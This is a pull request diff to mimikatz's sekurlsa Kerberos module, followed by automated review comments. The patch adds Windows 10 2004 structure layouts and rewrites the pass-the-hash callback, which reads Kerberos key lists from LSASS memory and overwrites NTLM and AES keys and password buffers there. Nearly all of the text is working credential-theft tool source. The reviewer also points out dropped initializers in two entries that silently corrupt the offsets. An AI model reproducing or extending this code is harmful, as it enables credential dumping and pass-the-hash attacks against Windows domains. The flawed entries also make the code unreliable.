Resolving #322 - fixing KERB_HASHPASSWORD structures #323

Open
wants to merge 1 commit into
base: master
157 changes: 109 additions & 48 deletions mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
Expand Up @@ -21,6 +21,7 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 6}},
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 7}},
{KULL_M_WIN_BUILD_10_2004, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable },{0,NULL}, { 6, 8}},
};
#elif defined(_M_IX86)
BYTE PTRN_WALL_KerbReferenceLogonSession[] = {0x8b, 0x7d, 0x08, 0x8b, 0x17, 0x39, 0x50};
Expand Down Expand Up @@ -80,7 +81,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)
},
{
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -117,7 +120,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -154,7 +159,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -192,6 +199,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -228,7 +237,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -265,7 +275,9 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -302,7 +314,8 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
Expand Down Expand Up @@ -339,8 +352,49 @@ const KERB_INFOS kerbHelper[] = {
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction)
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC,Checksump)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials),
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_1),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_2),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
},
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetDomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Description),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, AltTargetDomainName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ClientName),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketFlags),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, KeyType),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Key),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, StartTime),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, EndTime),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, RenewUntil),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketEncType),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, Ticket),
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TicketKvno),
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_10_1607),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, pKeyList),
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
FIELD_OFFSET(KERB_HASHPASSWORD_6_2004 , generic),
sizeof(KERB_HASHPASSWORD_6_2004),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC_2004,Size),
FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC_2004,Checksump)
}
};

KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
Expand Down Expand Up @@ -468,10 +522,13 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE;
UNICODE_STRING nullPasswd = {0, 0, NULL};
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPasswordErase, RemoteLocalKerbSession.hMemory};
PKERB_HASHPASSWORD_GENERIC pHash;

PBYTE baseCheck;
PCWCHAR resultok;
SIZE_T offset;
DWORD* hashType=NULL;
SIZE_T* hashSize=NULL;
PBYTE* hashChecksump=NULL;

if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
Expand Down Expand Up @@ -504,6 +561,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY

RemoteLocalKerbSession.address = baseCheck = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;

if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
Expand All @@ -512,55 +570,58 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
{
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + offset);
kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(pHash->Type));

RemoteLocalKerbSession.address = pHash->Checksump;

hashType= (DWORD*)((PBYTE)aLocalHashMemory.address + offset );
hashSize = (SIZE_T*)((PBYTE)aLocalHashMemory.address + offset + kerbHelper[KerbOffsetIndex].offsetSize);
hashChecksump =(PBYTE*) ((PBYTE)aLocalHashMemory.address + offset + kerbHelper[KerbOffsetIndex].offsetChecksump);
kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(*hashType));
RemoteLocalKerbSession.address = *hashChecksump;

resultok = L"OK";
if(isNtlm && ((pHash->Type != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Type != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (pHash->Size == LM_NTLM_HASH_LENGTH))
if(isNtlm && ((*hashType != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (*hashType != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (*hashSize == LM_NTLM_HASH_LENGTH))
{
aLocalNTLMMemory.address = ntlmHash;
offset = LM_NTLM_HASH_LENGTH;
aLocalNTLMMemory.address = ntlmHash;
offset = LM_NTLM_HASH_LENGTH;
}
else if(isAes128 && (pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Size == AES_128_KEY_LENGTH))
else if(isAes128 && (*hashType == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (*hashSize == AES_128_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes128key;
offset = AES_128_KEY_LENGTH;
aLocalNTLMMemory.address = aes128key;
offset = AES_128_KEY_LENGTH;
}
else if(isAes256 && (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (pHash->Size == AES_256_KEY_LENGTH))
else if(isAes256 && (*hashType == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (*hashSize == AES_256_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes256key;
offset = AES_256_KEY_LENGTH;
aLocalNTLMMemory.address = aes256key;
offset = AES_256_KEY_LENGTH;
}
else
{
aLocalNTLMMemory.address = pHash;
RemoteLocalKerbSession.address = baseCheck + offset;
offset = FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump);
resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL);
pHash->Type = KERB_ETYPE_NULL;
pHash->Size = 0;
kprintf(L"-> ");
aLocalNTLMMemory.address = hashType;
RemoteLocalKerbSession.address = baseCheck + offset;
offset = kerbHelper[KerbOffsetIndex].offsetChecksump;
resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL);

*hashType= KERB_ETYPE_NULL;
*hashSize = 0;
kprintf(L"-> ");
}

if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, offset))
kprintf(L"%s", resultok);
kprintf(L"%s", resultok);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}

if(pthData->isReplaceOk)
{
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
{
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
kprintf(L"null");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
LocalFree(aLocalPasswdMemory.address);
}
}
}

if(pthData->isReplaceOk)
{
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
{
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
kprintf(L"null");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
LocalFree(aLocalPasswdMemory.address);
}
}
}
LocalFree(aLocalHashMemory.address);
}
}
Expand Down Expand Up @@ -636,13 +697,13 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION

if(!isNormalSessionKey)
{
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
if(pKiwiTicket->Key.Length <= (FIELD_OFFSET(LSAISO_DATA_BLOB, data) + (sizeof("KerberosKey") - 1) + AES_256_KEY_LENGTH)) // usual ISO DATA BLOB for Kerberos AES 256 session key
{
if(kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value, &lsaIsoKey.Value, &lsaIsoKey.Length))
{
kprintf(L"\n\t * Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t ");
kprintf(L"\n\t * Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kprintf(L"\n\t ");
kull_m_string_wprintf_hex(lsaIsoKey.Value, lsaIsoKey.Length, 0);
kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(&pKiwiTicket->Key);
pKiwiTicket->Key = lsaIsoKey;
Expand All @@ -657,7 +718,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE))
{
if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
kprintf(L"\n\t * Saved to file %s !", filename);
kprintf(L"\n\t * Saved to file %s !", filename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
ber_bvfree(BerApp_KrbCred);
}
Expand Down Expand Up @@ -779,4 +840,4 @@ void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBu
kull_m_memory_copy(&aLocalBuffer, &aBuffer, pBuffer->Length);
}
}
}
}
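Review bot: In the hunks at `@@ -228,7 +237,8` and `@@ -302,7 +314,8` the `sizeof(...) - FIELD_OFFSET(..., Password)` / `(..., unk0)` line is removed and, going by the 7→8 line counts, not re-added with a trailing comma as it is in the other entries, so those two `kerbHelper` entries lose their `passwordEraseSize` initializer and the positional initializer shifts: `passwordEraseSize` receives `FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Size)`, `offsetSize` receives the `Checksump` offset and `offsetChecksump` stays zero, so in the pth callback `hashChecksump` aliases `Type` and the else branch's copy length becomes zero. Restore `sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),` in the first hunk and `sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),` in the second, directly above the two added `FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, ...)` lines. If the project's toolchain accepts C99 designated initializers, writing the two new slots as `.offsetSize = ...` and `.offsetChecksump = ...` would turn a dropped line into a compile-time error instead of a silent shift. The added lines also mix `GENERIC,Size` with the file's `GENERIC, Size` form, put a space before the comma in `KERB_HASHPASSWORD_6_2004 , generic`, and use `hashType= (DWORD*)` / `hashChecksump =(PBYTE*)` spacing in `kuhl_m_sekurlsa_enum_kerberos_callback_pth`, whose start lies outside its hunk; match the surrounding `FIELD_OFFSET(X, Y)` and `a = (T *)` style.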
26 changes: 25 additions & 1 deletion mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
Expand Up @@ -77,6 +77,8 @@ typedef struct _KERB_INFOS {

LONG offsetPasswordErase;
SIZE_T passwordEraseSize;
LONG offsetSize;
LONG offsetChecksump;
} KERB_INFOS, *PKERB_INFOS;

typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
Expand Down Expand Up @@ -561,12 +563,25 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_10_1607 {
KIWI_KERBEROS_BUFFER Ticket;
} KIWI_KERBEROS_INTERNAL_TICKET_10_1607, *PKIWI_KERBEROS_INTERNAL_TICKET_10_1607;


typedef struct _KERB_HASHPASSWORD_GENERIC {
DWORD Type;
SIZE_T Size;
PBYTE Checksump;
} KERB_HASHPASSWORD_GENERIC, *PKERB_HASHPASSWORD_GENERIC;


#pragma pack(push, 1)
typedef struct _KERB_HASHPASSWORD_GENERIC_2004
{
DWORD Type;
SIZE_T Size;
PBYTE Checksump;
} KERB_HASHPASSWORD_GENERIC_2004 , *PKERB_HASHPASSWORD_GENERIC_2004 ;
#pragma pack(pop)



typedef struct _KERB_HASHPASSWORD_5 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
KERB_HASHPASSWORD_GENERIC generic;
Expand All @@ -585,6 +600,15 @@ typedef struct _KERB_HASHPASSWORD_6_1607 {
KERB_HASHPASSWORD_GENERIC generic;
} KERB_HASHPASSWORD_6_1607, *PKERB_HASHPASSWORD_6_1607;


typedef struct _KERB_HASHPASSWORD_6_2004 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
PVOID stringToKey; // AES Iterations (dword ?)
PVOID unk0;
DWORD unk1;
KERB_HASHPASSWORD_GENERIC_2004 generic;
} KERB_HASHPASSWORD_6_2004, *PKERB_HASHPASSWORD_6_2004;

typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
DWORD unk0; // dword_1233EC8 dd 4
DWORD cbItem; // debug048:01233ECC dd 5
Expand All @@ -606,4 +630,4 @@ typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
BOOL isTicketExport;
BOOL isFullTicket;
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;
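Review bot: `KERB_HASHPASSWORD_GENERIC_2004` in the `@@ -561,12 +563,25` hunk is member-for-member identical to `KERB_HASHPASSWORD_GENERIC` and differs only by `#pragma pack(push, 1)`, but nothing records why a packed twin is needed; presumably it is to stop the compiler inserting padding after `DWORD unk1` in `KERB_HASHPASSWORD_6_2004` and between `Type` and `Size`, so a comment on the typedef such as `// same fields as KERB_HASHPASSWORD_GENERIC; packed because in the 2004 layout it directly follows a DWORD with no alignment padding` should be added once that is confirmed. The two new `KERB_INFOS` members `offsetSize` and `offsetChecksump` are the only members in that struct whose meaning is not obvious from the name; `// offsets of Size and Checksump inside the generic hash entry, relative to offsetHashGeneric` would tie them to the field they pair with. Style: the typedef line has a space before each comma and the semicolon (`KERB_HASHPASSWORD_GENERIC_2004 , *PKERB_HASHPASSWORD_GENERIC_2004 ;`), the new struct puts its opening brace on its own line unlike every neighbouring typedef, and the hunks add runs of two or three blank lines between declarations where the file otherwise uses one.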